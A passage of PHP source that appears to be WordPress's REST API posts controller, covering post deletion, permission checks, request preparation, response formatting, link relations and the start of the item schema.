return rest_ensure_response( $response );
}
/** This action is documented in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php */
do_action( "rest_after_insert_{$this->post_type}", $post, $request, false );
$response = $this->prepare_item_for_response( $post, $request );
return rest_ensure_response( $response );
}
/**
* Checks if a given request has access to delete a post.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has access to delete the item, WP_Error object otherwise.
*/
public function delete_item_permissions_check( $request ) {
$post = $this->get_post( $request['id'] );
if ( is_wp_error( $post ) ) {
return $post;
}
if ( $post && ! $this->check_delete_permission( $post ) ) {
return new WP_Error( 'rest_cannot_delete', __( 'Sorry, you are not allowed to delete this post.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Deletes a single post.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function delete_item( $request ) {
$post = $this->get_post( $request['id'] );
if ( is_wp_error( $post ) ) {
return $post;
}
$id = $post->ID;
$force = (bool) $request['force'];
$supports_trash = ( EMPTY_TRASH_DAYS > 0 );
if ( 'attachment' === $post->post_type ) {
$supports_trash = $supports_trash && MEDIA_TRASH;
}
/**
* Filters whether a post is trashable.
*
* The dynamic portion of the hook name, `$this->post_type`, refers to the post type slug.
*
* Pass false to disable trash support for the post.
*
* @since 4.7.0
*
* @param bool $supports_trash Whether the post type support trashing.
* @param WP_Post $post The Post object being considered for trashing support.
*/
$supports_trash = apply_filters( "rest_{$this->post_type}_trashable", $supports_trash, $post );
if ( ! $this->check_delete_permission( $post ) ) {
return new WP_Error( 'rest_user_cannot_delete_post', __( 'Sorry, you are not allowed to delete this post.' ), array( 'status' => rest_authorization_required_code() ) );
}
$request->set_param( 'context', 'edit' );
// If we're forcing, then delete permanently.
if ( $force ) {
$previous = $this->prepare_item_for_response( $post, $request );
$result = wp_delete_post( $id, true );
$response = new WP_REST_Response();
$response->set_data( array( 'deleted' => true, 'previous' => $previous->get_data() ) );
} else {
// If we don't support trashing for this type, error out.
if ( ! $supports_trash ) {
/* translators: %s: force=true */
return new WP_Error( 'rest_trash_not_supported', sprintf( __( "The post does not support trashing. Set '%s' to delete." ), 'force=true' ), array( 'status' => 501 ) );
}
// Otherwise, only trash if we haven't already.
if ( 'trash' === $post->post_status ) {
return new WP_Error( 'rest_already_trashed', __( 'The post has already been deleted.' ), array( 'status' => 410 ) );
}
// (Note that internally this falls through to `wp_delete_post` if
// the trash is disabled.)
$result = wp_trash_post( $id );
$post = get_post( $id );
$response = $this->prepare_item_for_response( $post, $request );
}
if ( ! $result ) {
return new WP_Error( 'rest_cannot_delete', __( 'The post cannot be deleted.' ), array( 'status' => 500 ) );
}
/**
* Fires immediately after a single post is deleted or trashed via the REST API.
*
* They dynamic portion of the hook name, `$this->post_type`, refers to the post type slug.
*
* @since 4.7.0
*
* @param object $post The deleted or trashed post.
* @param WP_REST_Response $response The response data.
* @param WP_REST_Request $request The request sent to the API.
*/
do_action( "rest_delete_{$this->post_type}", $post, $response, $request );
return $response;
}
/**
* Determines the allowed query_vars for a get_items() response and prepares
* them for WP_Query.
*
* @since 4.7.0
*
* @param array $prepared_args Optional. Prepared WP_Query arguments. Default empty array.
* @param WP_REST_Request $request Optional. Full details about the request.
* @return array Items query arguments.
*/
protected function prepare_items_query( $prepared_args = array(), $request = null ) {
$query_args = array();
foreach ( $prepared_args as $key => $value ) {
/**
* Filters the query_vars used in get_items() for the constructed query.
*
* The dynamic portion of the hook name, `$key`, refers to the query_var key.
*
* @since 4.7.0
*
* @param string $value The query_var value.
*/
$query_args[ $key ] = apply_filters( "rest_query_var-{$key}", $value ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
}
if ( 'post' !== $this->post_type || ! isset( $query_args['ignore_sticky_posts'] ) ) {
$query_args['ignore_sticky_posts'] = true;
}
// Map to proper WP_Query orderby param.
if ( isset( $query_args['orderby'] ) && isset( $request['orderby'] ) ) {
$orderby_mappings = array(
'id' => 'ID',
'include' => 'post__in',
'slug' => 'post_name',
'include_slugs' => 'post_name__in',
);
if ( isset( $orderby_mappings[ $request['orderby'] ] ) ) {
$query_args['orderby'] = $orderby_mappings[ $request['orderby'] ];
}
}
return $query_args;
}
/**
* Checks the post_date_gmt or modified_gmt and prepare any post or
* modified date for single post output.
*
* @since 4.7.0
*
* @param string $date_gmt GMT publication time.
* @param string|null $date Optional. Local publication time. Default null.
* @return string|null ISO8601/RFC3339 formatted datetime.
*/
protected function prepare_date_response( $date_gmt, $date = null ) {
// Use the date if passed.
if ( isset( $date ) ) {
return mysql_to_rfc3339( $date );
}
// Return null if $date_gmt is empty/zeros.
if ( '0000-00-00 00:00:00' === $date_gmt ) {
return null;
}
// Return the formatted datetime.
return mysql_to_rfc3339( $date_gmt );
}
/**
* Prepares a single post for create or update.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Request object.
* @return stdClass|WP_Error Post object or WP_Error.
*/
protected function prepare_item_for_database( $request ) {
$prepared_post = new stdClass();
// Post ID.
if ( isset( $request['id'] ) ) {
$existing_post = $this->get_post( $request['id'] );
if ( is_wp_error( $existing_post ) ) {
return $existing_post;
}
$prepared_post->ID = $existing_post->ID;
}
$schema = $this->get_item_schema();
// Post title.
if ( ! empty( $schema['properties']['title'] ) && isset( $request['title'] ) ) {
if ( is_string( $request['title'] ) ) {
$prepared_post->post_title = $request['title'];
} elseif ( ! empty( $request['title']['raw'] ) ) {
$prepared_post->post_title = $request['title']['raw'];
}
}
// Post content.
if ( ! empty( $schema['properties']['content'] ) && isset( $request['content'] ) ) {
if ( is_string( $request['content'] ) ) {
$prepared_post->post_content = $request['content'];
} elseif ( isset( $request['content']['raw'] ) ) {
$prepared_post->post_content = $request['content']['raw'];
}
}
// Post excerpt.
if ( ! empty( $schema['properties']['excerpt'] ) && isset( $request['excerpt'] ) ) {
if ( is_string( $request['excerpt'] ) ) {
$prepared_post->post_excerpt = $request['excerpt'];
} elseif ( isset( $request['excerpt']['raw'] ) ) {
$prepared_post->post_excerpt = $request['excerpt']['raw'];
}
}
// Post type.
if ( empty( $request['id'] ) ) {
// Creating new post, use default type for the controller.
$prepared_post->post_type = $this->post_type;
} else {
// Updating a post, use previous type.
$prepared_post->post_type = get_post_type( $request['id'] );
}
$post_type = get_post_type_object( $prepared_post->post_type );
// Post status.
if ( ! empty( $schema['properties']['status'] ) && isset( $request['status'] ) ) {
$status = $this->handle_status_param( $request['status'], $post_type );
if ( is_wp_error( $status ) ) {
return $status;
}
$prepared_post->post_status = $status;
}
// Post date.
if ( ! empty( $schema['properties']['date'] ) && ! empty( $request['date'] ) ) {
$date_data = rest_get_date_with_gmt( $request['date'] );
if ( ! empty( $date_data ) ) {
list( $prepared_post->post_date, $prepared_post->post_date_gmt ) = $date_data;
$prepared_post->edit_date = true;
}
} elseif ( ! empty( $schema['properties']['date_gmt'] ) && ! empty( $request['date_gmt'] ) ) {
$date_data = rest_get_date_with_gmt( $request['date_gmt'], true );
if ( ! empty( $date_data ) ) {
list( $prepared_post->post_date, $prepared_post->post_date_gmt ) = $date_data;
$prepared_post->edit_date = true;
}
}
// Post slug.
if ( ! empty( $schema['properties']['slug'] ) && isset( $request['slug'] ) ) {
$prepared_post->post_name = $request['slug'];
}
// Author.
if ( ! empty( $schema['properties']['author'] ) && ! empty( $request['author'] ) ) {
$post_author = (int) $request['author'];
if ( get_current_user_id() !== $post_author ) {
$user_obj = get_userdata( $post_author );
if ( ! $user_obj ) {
return new WP_Error( 'rest_invalid_author', __( 'Invalid author ID.' ), array( 'status' => 400 ) );
}
}
$prepared_post->post_author = $post_author;
}
// Post password.
if ( ! empty( $schema['properties']['password'] ) && isset( $request['password'] ) ) {
$prepared_post->post_password = $request['password'];
if ( '' !== $request['password'] ) {
if ( ! empty( $schema['properties']['sticky'] ) && ! empty( $request['sticky'] ) ) {
return new WP_Error( 'rest_invalid_field', __( 'A post can not be sticky and have a password.' ), array( 'status' => 400 ) );
}
if ( ! empty( $prepared_post->ID ) && is_sticky( $prepared_post->ID ) ) {
return new WP_Error( 'rest_invalid_field', __( 'A sticky post can not be password protected.' ), array( 'status' => 400 ) );
}
}
}
if ( ! empty( $schema['properties']['sticky'] ) && ! empty( $request['sticky'] ) ) {
if ( ! empty( $prepared_post->ID ) && post_password_required( $prepared_post->ID ) ) {
return new WP_Error( 'rest_invalid_field', __( 'A password protected post can not be set to sticky.' ), array( 'status' => 400 ) );
}
}
// Parent.
if ( ! empty( $schema['properties']['parent'] ) && isset( $request['parent'] ) ) {
if ( 0 === (int) $request['parent'] ) {
$prepared_post->post_parent = 0;
} else {
$parent = get_post( (int) $request['parent'] );
if ( empty( $parent ) ) {
return new WP_Error( 'rest_post_invalid_id', __( 'Invalid post parent ID.' ), array( 'status' => 400 ) );
}
$prepared_post->post_parent = (int) $parent->ID;
}
}
// Menu order.
if ( ! empty( $schema['properties']['menu_order'] ) && isset( $request['menu_order'] ) ) {
$prepared_post->menu_order = (int) $request['menu_order'];
}
// Comment status.
if ( ! empty( $schema['properties']['comment_status'] ) && ! empty( $request['comment_status'] ) ) {
$prepared_post->comment_status = $request['comment_status'];
}
// Ping status.
if ( ! empty( $schema['properties']['ping_status'] ) && ! empty( $request['ping_status'] ) ) {
$prepared_post->ping_status = $request['ping_status'];
}
if ( ! empty( $schema['properties']['template'] ) ) {
// Force template to null so that it can be handled exclusively by the REST controller.
$prepared_post->page_template = null;
}
/**
* Filters a post before it is inserted via the REST API.
*
* The dynamic portion of the hook name, `$this->post_type`, refers to the post type slug.
*
* @since 4.7.0
*
* @param stdClass $prepared_post An object representing a single post prepared
* for inserting or updating the database.
* @param WP_REST_Request $request Request object.
*/
return apply_filters( "rest_pre_insert_{$this->post_type}", $prepared_post, $request );
}
/**
* Determines validity and normalizes the given status parameter.
*
* @since 4.7.0
*
* @param string $post_status Post status.
* @param object $post_type Post type.
* @return string|WP_Error Post status or WP_Error if lacking the proper permission.
*/
protected function handle_status_param( $post_status, $post_type ) {
switch ( $post_status ) {
case 'draft':
case 'pending':
break;
case 'private':
if ( ! current_user_can( $post_type->cap->publish_posts ) ) {
return new WP_Error( 'rest_cannot_publish', __( 'Sorry, you are not allowed to create private posts in this post type.' ), array( 'status' => rest_authorization_required_code() ) );
}
break;
case 'publish':
case 'future':
if ( ! current_user_can( $post_type->cap->publish_posts ) ) {
return new WP_Error( 'rest_cannot_publish', __( 'Sorry, you are not allowed to publish posts in this post type.' ), array( 'status' => rest_authorization_required_code() ) );
}
break;
default:
if ( ! get_post_status_object( $post_status ) ) {
$post_status = 'draft';
}
break;
}
return $post_status;
}
/**
* Determines the featured media based on a request param.
*
* @since 4.7.0
*
* @param int $featured_media Featured Media ID.
* @param int $post_id Post ID.
* @return bool|WP_Error Whether the post thumbnail was successfully deleted, otherwise WP_Error.
*/
protected function handle_featured_media( $featured_media, $post_id ) {
$featured_media = (int) $featured_media;
if ( $featured_media ) {
$result = set_post_thumbnail( $post_id, $featured_media );
if ( $result ) {
return true;
} else {
return new WP_Error( 'rest_invalid_featured_media', __( 'Invalid featured media ID.' ), array( 'status' => 400 ) );
}
} else {
return delete_post_thumbnail( $post_id );
}
}
/**
* Check whether the template is valid for the given post.
*
* @since 4.9.0
*
* @param string $template Page template filename.
* @param WP_REST_Request $request Request.
* @return bool|WP_Error True if template is still valid or if the same as existing value, or false if template not supported.
*/
public function check_template( $template, $request ) {
if ( ! $template ) {
return true;
}
if ( $request['id'] ) {
$current_template = get_page_template_slug( $request['id'] );
} else {
$current_template = '';
}
// Always allow for updating a post to the same template, even if that template is no longer supported.
if ( $template === $current_template ) {
return true;
}
// If this is a create request, get_post() will return null and wp theme will fallback to the passed post type.
$allowed_templates = wp_get_theme()->get_page_templates( get_post( $request['id'] ), $this->post_type );
if ( isset( $allowed_templates[ $template ] ) ) {
return true;
}
/* translators: 1: parameter, 2: list of valid values */
return new WP_Error( 'rest_invalid_param', sprintf( __( '%1$s is not one of %2$s.' ), 'template', implode( ', ', array_keys( $allowed_templates ) ) ) );
}
/**
* Sets the template for a post.
*
* @since 4.7.0
* @since 4.9.0 Introduced the $validate parameter.
*
* @param string $template Page template filename.
* @param integer $post_id Post ID.
* @param bool $validate Whether to validate that the template selected is valid.
*/
public function handle_template( $template, $post_id, $validate = false ) {
if ( $validate && ! array_key_exists( $template, wp_get_theme()->get_page_templates( get_post( $post_id ) ) ) ) {
$template = '';
}
update_post_meta( $post_id, '_wp_page_template', $template );
}
/**
* Updates the post's terms from a REST request.
*
* @since 4.7.0
*
* @param int $post_id The post ID to update the terms form.
* @param WP_REST_Request $request The request object with post and terms data.
* @return null|WP_Error WP_Error on an error assigning any of the terms, otherwise null.
*/
protected function handle_terms( $post_id, $request ) {
$taxonomies = wp_list_filter( get_object_taxonomies( $this->post_type, 'objects' ), array( 'show_in_rest' => true ) );
foreach ( $taxonomies as $taxonomy ) {
$base = ! empty( $taxonomy->rest_base ) ? $taxonomy->rest_base : $taxonomy->name;
if ( ! isset( $request[ $base ] ) ) {
continue;
}
$result = wp_set_object_terms( $post_id, $request[ $base ], $taxonomy->name );
if ( is_wp_error( $result ) ) {
return $result;
}
}
}
/**
* Checks whether current user can assign all terms sent with the current request.
*
* @since 4.7.0
*
* @param WP_REST_Request $request The request object with post and terms data.
* @return bool Whether the current user can assign the provided terms.
*/
protected function check_assign_terms_permission( $request ) {
$taxonomies = wp_list_filter( get_object_taxonomies( $this->post_type, 'objects' ), array( 'show_in_rest' => true ) );
foreach ( $taxonomies as $taxonomy ) {
$base = ! empty( $taxonomy->rest_base ) ? $taxonomy->rest_base : $taxonomy->name;
if ( ! isset( $request[ $base ] ) ) {
continue;
}
foreach ( $request[ $base ] as $term_id ) {
// Invalid terms will be rejected later.
if ( ! get_term( $term_id, $taxonomy->name ) ) {
continue;
}
if ( ! current_user_can( 'assign_term', (int) $term_id ) ) {
return false;
}
}
}
return true;
}
/**
* Checks if a given post type can be viewed or managed.
*
* @since 4.7.0
*
* @param object|string $post_type Post type name or object.
* @return bool Whether the post type is allowed in REST.
*/
protected function check_is_post_type_allowed( $post_type ) {
if ( ! is_object( $post_type ) ) {
$post_type = get_post_type_object( $post_type );
}
if ( ! empty( $post_type ) && ! empty( $post_type->show_in_rest ) ) {
return true;
}
return false;
}
/**
* Checks if a post can be read.
*
* Correctly handles posts with the inherit status.
*
* @since 4.7.0
*
* @param object $post Post object.
* @return bool Whether the post can be read.
*/
public function check_read_permission( $post ) {
$post_type = get_post_type_object( $post->post_type );
if ( ! $this->check_is_post_type_allowed( $post_type ) ) {
return false;
}
// Is the post readable?
if ( 'publish' === $post->post_status || current_user_can( $post_type->cap->read_post, $post->ID ) ) {
return true;
}
$post_status_obj = get_post_status_object( $post->post_status );
if ( $post_status_obj && $post_status_obj->public ) {
return true;
}
// Can we read the parent if we're inheriting?
if ( 'inherit' === $post->post_status && $post->post_parent > 0 ) {
$parent = get_post( $post->post_parent );
if ( $parent ) {
return $this->check_read_permission( $parent );
}
}
/*
* If there isn't a parent, but the status is set to inherit, assume
* it's published (as per get_post_status()).
*/
if ( 'inherit' === $post->post_status ) {
return true;
}
return false;
}
/**
* Checks if a post can be edited.
*
* @since 4.7.0
*
* @param object $post Post object.
* @return bool Whether the post can be edited.
*/
protected function check_update_permission( $post ) {
$post_type = get_post_type_object( $post->post_type );
if ( ! $this->check_is_post_type_allowed( $post_type ) ) {
return false;
}
return current_user_can( $post_type->cap->edit_post, $post->ID );
}
/**
* Checks if a post can be created.
*
* @since 4.7.0
*
* @param object $post Post object.
* @return bool Whether the post can be created.
*/
protected function check_create_permission( $post ) {
$post_type = get_post_type_object( $post->post_type );
if ( ! $this->check_is_post_type_allowed( $post_type ) ) {
return false;
}
return current_user_can( $post_type->cap->create_posts );
}
/**
* Checks if a post can be deleted.
*
* @since 4.7.0
*
* @param object $post Post object.
* @return bool Whether the post can be deleted.
*/
protected function check_delete_permission( $post ) {
$post_type = get_post_type_object( $post->post_type );
if ( ! $this->check_is_post_type_allowed( $post_type ) ) {
return false;
}
return current_user_can( $post_type->cap->delete_post, $post->ID );
}
/**
* Prepares a single post output for response.
*
* @since 4.7.0
*
* @param WP_Post $post Post object.
* @param WP_REST_Request $request Request object.
* @return WP_REST_Response Response object.
*/
public function prepare_item_for_response( $post, $request ) {
$GLOBALS['post'] = $post;
setup_postdata( $post );
$fields = $this->get_fields_for_response( $request );
// Base fields for every post.
$data = array();
if ( in_array( 'id', $fields, true ) ) {
$data['id'] = $post->ID;
}
if ( in_array( 'date', $fields, true ) ) {
$data['date'] = $this->prepare_date_response( $post->post_date_gmt, $post->post_date );
}
if ( in_array( 'date_gmt', $fields, true ) ) {
// For drafts, `post_date_gmt` may not be set, indicating that the
// date of the draft should be updated each time it is saved (see
// #38883). In this case, shim the value based on the `post_date`
// field with the site's timezone offset applied.
if ( '0000-00-00 00:00:00' === $post->post_date_gmt ) {
$post_date_gmt = get_gmt_from_date( $post->post_date );
} else {
$post_date_gmt = $post->post_date_gmt;
}
$data['date_gmt'] = $this->prepare_date_response( $post_date_gmt );
}
if ( in_array( 'guid', $fields, true ) ) {
$data['guid'] = array(
/** This filter is documented in wp-includes/post-template.php */
'rendered' => apply_filters( 'get_the_guid', $post->guid, $post->ID ),
'raw' => $post->guid,
);
}
if ( in_array( 'modified', $fields, true ) ) {
$data['modified'] = $this->prepare_date_response( $post->post_modified_gmt, $post->post_modified );
}
if ( in_array( 'modified_gmt', $fields, true ) ) {
// For drafts, `post_modified_gmt` may not be set (see
// `post_date_gmt` comments above). In this case, shim the value
// based on the `post_modified` field with the site's timezone
// offset applied.
if ( '0000-00-00 00:00:00' === $post->post_modified_gmt ) {
$post_modified_gmt = date( 'Y-m-d H:i:s', strtotime( $post->post_modified ) - ( get_option( 'gmt_offset' ) * 3600 ) );
} else {
$post_modified_gmt = $post->post_modified_gmt;
}
$data['modified_gmt'] = $this->prepare_date_response( $post_modified_gmt );
}
if ( in_array( 'password', $fields, true ) ) {
$data['password'] = $post->post_password;
}
if ( in_array( 'slug', $fields, true ) ) {
$data['slug'] = $post->post_name;
}
if ( in_array( 'status', $fields, true ) ) {
$data['status'] = $post->post_status;
}
if ( in_array( 'type', $fields, true ) ) {
$data['type'] = $post->post_type;
}
if ( in_array( 'link', $fields, true ) ) {
$data['link'] = get_permalink( $post->ID );
}
if ( in_array( 'title', $fields, true ) ) {
add_filter( 'protected_title_format', array( $this, 'protected_title_format' ) );
$data['title'] = array(
'raw' => $post->post_title,
'rendered' => get_the_title( $post->ID ),
);
remove_filter( 'protected_title_format', array( $this, 'protected_title_format' ) );
}
$has_password_filter = false;
if ( $this->can_access_password_content( $post, $request ) ) {
$this->password_check_passed[ $post->ID ] = true;
// Allow access to the post, permissions already checked before.
add_filter( 'post_password_required', array( $this, 'check_password_required' ), 10, 2 );
$has_password_filter = true;
}
if ( in_array( 'content', $fields, true ) ) {
$data['content'] = array(
'raw' => $post->post_content,
/** This filter is documented in wp-includes/post-template.php */
'rendered' => post_password_required( $post ) ? '' : apply_filters( 'the_content', $post->post_content ),
'protected' => (bool) $post->post_password,
'block_version' => block_version( $post->post_content ),
);
}
if ( in_array( 'excerpt', $fields, true ) ) {
/** This filter is documented in wp-includes/post-template.php */
$excerpt = apply_filters( 'the_excerpt', apply_filters( 'get_the_excerpt', $post->post_excerpt, $post ) );
$data['excerpt'] = array(
'raw' => $post->post_excerpt,
'rendered' => post_password_required( $post ) ? '' : $excerpt,
'protected' => (bool) $post->post_password,
);
}
if ( $has_password_filter ) {
// Reset filter.
remove_filter( 'post_password_required', array( $this, 'check_password_required' ) );
}
if ( in_array( 'author', $fields, true ) ) {
$data['author'] = (int) $post->post_author;
}
if ( in_array( 'featured_media', $fields, true ) ) {
$data['featured_media'] = (int) get_post_thumbnail_id( $post->ID );
}
if ( in_array( 'parent', $fields, true ) ) {
$data['parent'] = (int) $post->post_parent;
}
if ( in_array( 'menu_order', $fields, true ) ) {
$data['menu_order'] = (int) $post->menu_order;
}
if ( in_array( 'comment_status', $fields, true ) ) {
$data['comment_status'] = $post->comment_status;
}
if ( in_array( 'ping_status', $fields, true ) ) {
$data['ping_status'] = $post->ping_status;
}
if ( in_array( 'sticky', $fields, true ) ) {
$data['sticky'] = is_sticky( $post->ID );
}
if ( in_array( 'template', $fields, true ) ) {
if ( $template = get_page_template_slug( $post->ID ) ) {
$data['template'] = $template;
} else {
$data['template'] = '';
}
}
if ( in_array( 'format', $fields, true ) ) {
$data['format'] = get_post_format( $post->ID );
// Fill in blank post format.
if ( empty( $data['format'] ) ) {
$data['format'] = 'standard';
}
}
if ( in_array( 'meta', $fields, true ) ) {
$data['meta'] = $this->meta->get_value( $post->ID, $request );
}
$taxonomies = wp_list_filter( get_object_taxonomies( $this->post_type, 'objects' ), array( 'show_in_rest' => true ) );
foreach ( $taxonomies as $taxonomy ) {
$base = ! empty( $taxonomy->rest_base ) ? $taxonomy->rest_base : $taxonomy->name;
if ( in_array( $base, $fields, true ) ) {
$terms = get_the_terms( $post, $taxonomy->name );
$data[ $base ] = $terms ? array_values( wp_list_pluck( $terms, 'term_id' ) ) : array();
}
}
$post_type_obj = get_post_type_object( $post->post_type );
if ( is_post_type_viewable( $post_type_obj ) && $post_type_obj->public ) {
if ( ! function_exists( 'get_sample_permalink' ) ) {
require_once ABSPATH . '/wp-admin/includes/post.php';
}
$sample_permalink = get_sample_permalink( $post->ID, $post->post_title, '' );
if ( in_array( 'permalink_template', $fields, true ) ) {
$data['permalink_template'] = $sample_permalink[0];
}
if ( in_array( 'generated_slug', $fields, true ) ) {
$data['generated_slug'] = $sample_permalink[1];
}
}
$context = ! empty( $request['context'] ) ? $request['context'] : 'view';
$data = $this->add_additional_fields_to_object( $data, $request );
$data = $this->filter_response_by_context( $data, $context );
// Wrap the data in a response object.
$response = rest_ensure_response( $data );
$links = $this->prepare_links( $post );
$response->add_links( $links );
if ( ! empty( $links['self']['href'] ) ) {
$actions = $this->get_available_actions( $post, $request );
$self = $links['self']['href'];
foreach ( $actions as $rel ) {
$response->add_link( $rel, $self );
}
}
/**
* Filters the post data for a response.
*
* The dynamic portion of the hook name, `$this->post_type`, refers to the post type slug.
*
* @since 4.7.0
*
* @param WP_REST_Response $response The response object.
* @param WP_Post $post Post object.
* @param WP_REST_Request $request Request object.
*/
return apply_filters( "rest_prepare_{$this->post_type}", $response, $post, $request );
}
/**
* Overwrites the default protected title format.
*
* By default, WordPress will show password protected posts with a title of
* "Protected: %s", as the REST API communicates the protected status of a post
* in a machine readable format, we remove the "Protected: " prefix.
*
* @since 4.7.0
*
* @return string Protected title format.
*/
public function protected_title_format() {
return '%s';
}
/**
* Prepares links for the request.
*
* @since 4.7.0
*
* @param WP_Post $post Post object.
* @return array Links for the given post.
*/
protected function prepare_links( $post ) {
$base = sprintf( '%s/%s', $this->namespace, $this->rest_base );
// Entity meta.
$links = array(
'self' => array(
'href' => rest_url( trailingslashit( $base ) . $post->ID ),
),
'collection' => array(
'href' => rest_url( $base ),
),
'about' => array(
'href' => rest_url( 'wp/v2/types/' . $this->post_type ),
),
);
if ( ( in_array( $post->post_type, array( 'post', 'page' ), true ) || post_type_supports( $post->post_type, 'author' ) )
&& ! empty( $post->post_author ) ) {
$links['author'] = array(
'href' => rest_url( 'wp/v2/users/' . $post->post_author ),
'embeddable' => true,
);
}
if ( in_array( $post->post_type, array( 'post', 'page' ), true ) || post_type_supports( $post->post_type, 'comments' ) ) {
$replies_url = rest_url( 'wp/v2/comments' );
$replies_url = add_query_arg( 'post', $post->ID, $replies_url );
$links['replies'] = array(
'href' => $replies_url,
'embeddable' => true,
);
}
if ( in_array( $post->post_type, array( 'post', 'page' ), true ) || post_type_supports( $post->post_type, 'revisions' ) ) {
$revisions = wp_get_post_revisions( $post->ID, array( 'fields' => 'ids' ) );
$revisions_count = count( $revisions );
$links['version-history'] = array(
'href' => rest_url( trailingslashit( $base ) . $post->ID . '/revisions' ),
'count' => $revisions_count,
);
if ( $revisions_count > 0 ) {
$last_revision = array_shift( $revisions );
$links['predecessor-version'] = array(
'href' => rest_url( trailingslashit( $base ) . $post->ID . '/revisions/' . $last_revision ),
'id' => $last_revision,
);
}
}
$post_type_obj = get_post_type_object( $post->post_type );
if ( $post_type_obj->hierarchical && ! empty( $post->post_parent ) ) {
$links['up'] = array(
'href' => rest_url( trailingslashit( $base ) . (int) $post->post_parent ),
'embeddable' => true,
);
}
// If we have a featured media, add that.
if ( $featured_media = get_post_thumbnail_id( $post->ID ) ) {
$image_url = rest_url( 'wp/v2/media/' . $featured_media );
$links['https://api.w.org/featuredmedia'] = array(
'href' => $image_url,
'embeddable' => true,
);
}
if ( ! in_array( $post->post_type, array( 'attachment', 'nav_menu_item', 'revision' ), true ) ) {
$attachments_url = rest_url( 'wp/v2/media' );
$attachments_url = add_query_arg( 'parent', $post->ID, $attachments_url );
$links['https://api.w.org/attachment'] = array(
'href' => $attachments_url,
);
}
$taxonomies = get_object_taxonomies( $post->post_type );
if ( ! empty( $taxonomies ) ) {
$links['https://api.w.org/term'] = array();
foreach ( $taxonomies as $tax ) {
$taxonomy_obj = get_taxonomy( $tax );
// Skip taxonomies that are not public.
if ( empty( $taxonomy_obj->show_in_rest ) ) {
continue;
}
$tax_base = ! empty( $taxonomy_obj->rest_base ) ? $taxonomy_obj->rest_base : $tax;
$terms_url = add_query_arg(
'post',
$post->ID,
rest_url( 'wp/v2/' . $tax_base )
);
$links['https://api.w.org/term'][] = array(
'href' => $terms_url,
'taxonomy' => $tax,
'embeddable' => true,
);
}
}
return $links;
}
/**
* Get the link relations available for the post and current user.
*
* @since 4.9.8
*
* @param WP_Post $post Post object.
* @param WP_REST_Request Request object.
*
* @return array List of link relations.
*/
protected function get_available_actions( $post, $request ) {
if ( 'edit' !== $request['context'] ) {
return array();
}
$rels = array();
$post_type = get_post_type_object( $post->post_type );
if ( 'attachment' !== $this->post_type && current_user_can( $post_type->cap->publish_posts ) ) {
$rels[] = 'https://api.w.org/action-publish';
}
if ( current_user_can( 'unfiltered_html' ) ) {
$rels[] = 'https://api.w.org/action-unfiltered-html';
}
if ( 'post' === $post_type->name ) {
if ( current_user_can( $post_type->cap->edit_others_posts ) && current_user_can( $post_type->cap->publish_posts ) ) {
$rels[] = 'https://api.w.org/action-sticky';
}
}
if ( post_type_supports( $post_type->name, 'author' ) ) {
if ( current_user_can( $post_type->cap->edit_others_posts ) ) {
$rels[] = 'https://api.w.org/action-assign-author';
}
}
$taxonomies = wp_list_filter( get_object_taxonomies( $this->post_type, 'objects' ), array( 'show_in_rest' => true ) );
foreach ( $taxonomies as $tax ) {
$tax_base = ! empty( $tax->rest_base ) ? $tax->rest_base : $tax->name;
$create_cap = is_taxonomy_hierarchical( $tax->name ) ? $tax->cap->edit_terms : $tax->cap->assign_terms;
if ( current_user_can( $create_cap ) ) {
$rels[] = 'https://api.w.org/action-create-' . $tax_base;
}
if ( current_user_can( $tax->cap->assign_terms ) ) {
$rels[] = 'https://api.w.org/action-assign-' . $tax_base;
}
}
return $rels;
}
/**
* Retrieves the post's schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => $this->post_type,
'type' => 'object',
// Base properties for every Post.
'properties' => array(
'date' => array(
'description' => __( "The date the object was published, in the site's timezone." ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'view', 'edit', 'embed' ),
),
'date_gmt' => array(
'description' => __( 'The date the object was published, as GMT.' ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'view', 'edit' ),
),
'guid' => array(
'description' => __( 'The globally unique identifier for the object.' ),
'type' => 'object',
'context' => array( 'view', 'edit' ),
'readonly' => true,
'properties' => array(
'raw' => array(
'description' => __( 'GUID for the object, as it exists in the database.' ),
'type' => 'string',
'context' => array( 'edit' ),
'readonly' => true,
),
'rendered' => array(
'description' => __( 'GUID for the object, transformed for display.' ),
'type' => 'string',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
),
),
'id' => array(
'description' => __( 'Unique identifier for the object.' ),
'type' => 'integer',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
'link' => array(
'description' => __( 'URL to the object.' ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
'modified' => array(
'description' => __( "The date the object was last modified, in the site's timezone." ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'modified_gmt' => array(
'description' => __( 'The date the object was last modified, as GMT.' ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'slug' => array(
'description' => __( 'An alphanumeric identifier for the object unique to its type.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'arg_options' => array(
'sanitize_callback' => array( $this, 'sanitize_slug' ),
),
),
'status' => array(
'description' => __( 'A named status for the object.' ),
'type' => 'string',
'enum' => array_keys( get_post_stati( array( 'internal' => false ) ) ),
'context' => array( 'view', 'edit' ),
),
'type' => array(
'description' => __( 'Type of Post for the object.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
'password' => array(
'description' => __( 'A password to protect access to the content and excerpt.' ),
'type' => 'string',
'context' => array( 'edit' ),
),
),
);
$post_type_obj = get_post_type_object( $this->post_type );
if ( is_post_type_viewable( $post_type_obj ) && $post_type_obj->public ) {
$schema['properties']['permalink_template'] = array(
'description' => __( 'Permalink template for the object.' ),
'type' => 'string',
'context' => array( 'edit' ),
'readonly' => true,
);
